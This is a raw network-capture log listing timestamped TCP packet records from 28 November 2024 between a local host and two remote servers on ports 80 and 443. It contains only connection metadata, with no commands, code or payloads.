                                                                      Nov 28, 2024 07:28:05.987076998 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.987160921 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.991203070 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.991276979 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.991285086 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.991332054 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.997805119 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.997853994 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.997874022 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.997921944 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.006226063 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.006302118 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.006335020 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.006400108 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.014717102 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.014740944 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.014832020 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.023143053 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.023205996 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.023262978 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.023299932 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.031496048 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.031553984 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.031590939 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.031630039 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.039999962 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.040066957 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.040087938 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.040127039 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.048377991 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.048439026 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.048491001 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.048530102 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.056828022 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.056863070 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.056925058 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.056956053 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.065304995 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.065352917 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.065413952 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.065449953 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.107108116 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.107156992 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.107188940 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.107228041 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.111296892 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.111356020 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.188229084 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.188307047 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.188343048 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.188380957 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.190768957 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.190818071 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.190917015 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.190953016 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.195632935 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.195696115 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.195734978 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.195775032 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.200578928 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.200625896 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.200726986 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.200773001 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.205527067 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.205574989 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.205591917 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.205614090 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.210439920 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.210481882 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.210563898 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.210603952 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.215372086 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.215430021 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.215471029 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.215511084 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.220313072 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.220357895 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.220412970 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.220448971 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.225397110 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.225414038 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.225452900 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.230184078 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.230245113 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.230345011 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.230385065 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.235138893 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.235198021 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.235240936 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.235280991 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.240024090 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.240077972 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.240128994 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.240168095 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.243859053 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.243910074 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.243966103 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.244013071 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.247704983 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.247761011 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.247805119 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.247839928 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.251481056 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.251535892 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.251563072 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.251595020 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.255259991 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.255307913 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.255378962 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.255418062 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.258980989 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.259030104 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.259052992 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:06.259090900 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.507531881 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:06.507581949 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:07.672396898 CET49165443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:07.672528982 CET44349165152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:07.672607899 CET49165443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:07.688812017 CET49165443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:07.688853025 CET44349165152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:09.276937962 CET44349165152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:09.277025938 CET49165443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:09.282057047 CET49165443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:09.282067060 CET44349165152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:09.282330990 CET44349165152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:09.282380104 CET49165443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:09.354310989 CET49165443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:09.399333954 CET44349165152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:09.992609024 CET44349165152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:09.992674112 CET49165443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:09.992698908 CET44349165152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:09.992708921 CET44349165152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:09.993026018 CET49165443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:09.993985891 CET49165443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:09.994000912 CET44349165152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:10.004013062 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:10.123956919 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:10.124022007 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:10.124236107 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:10.244115114 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.299926043 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.299945116 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.299957037 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300055027 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300059080 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.300067902 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300081968 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300121069 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.300307035 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300319910 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300332069 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300343990 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300384045 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.300421953 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.305962086 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.420274019 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.420310020 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.420423985 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.501163006 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.501223087 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.501224995 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.501264095 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.505326986 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.505378962 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.505454063 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.505492926 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.513714075 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.513772011 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.513881922 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.513947010 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.522175074 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.522236109 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.522250891 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.522289038 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.530560970 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.530623913 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.530677080 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.530711889 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.538980007 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.539026976 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.539113998 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.539148092 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.547364950 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.547413111 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.547457933 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.547489882 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.555743933 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.555793047 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.555856943 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.555886030 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.564166069 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.564208031 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.564301014 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.564336061 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.572658062 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.572738886 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.572740078 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.572772026 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.581146955 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.581213951 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.581221104 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.581255913 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.702673912 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.702759981 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.702785015 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.702821016 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.705224037 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.705270052 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.705322981 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.705358028 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.710369110 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.710427046 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.710465908 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.710500002 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.715540886 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.715635061 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.715651989 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.715687990 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.720612049 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.720659018 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.720751047 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.720787048 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.725764990 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.725810051 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.725886106 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.725924969 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.730838060 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.730876923 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.730935097 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.730967045 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.736012936 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.736068964 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.736130953 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.736167908 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.741113901 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.741169930 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.741195917 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.741233110 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.746184111 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.746206999 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.746239901 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.746256113 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.751282930 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.751338005 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.751377106 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.751421928 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.756448030 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.756504059 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.756556988 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.756618977 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.761584044 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.761647940 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.761693954 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.761739969 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.766645908 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.766690969 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.766760111 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.766936064 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.772244930 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.772320032 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.772404909 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.772454977 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.776926041 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.776976109 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.777029991 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.777086020 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.782067060 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.782121897 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.782164097 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.782211065 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.787175894 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.787205935 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.787246943 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.792256117 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.792304993 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.792349100 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.792387009 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.797514915 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.797558069 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.797700882 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.797743082 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.802417994 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.802463055 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.904155970 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.904206038 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.904264927 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.904295921 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.906105995 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.906142950 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.906228065 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.906258106 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.910243988 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.910296917 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.910360098 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.910396099 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.914346933 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.914390087 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.914454937 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.914484978 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.918437958 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.918489933 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.918611050 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.918648005 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.922405005 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.922446966 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.922521114 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.922553062 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.926263094 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.926311970 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.926450968 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.926489115 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.930094957 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.930143118 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.930171967 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.930207968 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.933820009 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.933861971 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.933938026 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.933974981 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.937618971 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.937668085 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.937746048 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.937777996 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.941349983 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.941416025 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.941459894 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.941494942 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.945067883 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.945122004 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.945122957 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.945149899 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.948816061 CET8049166172.245.123.29192.168.2.22
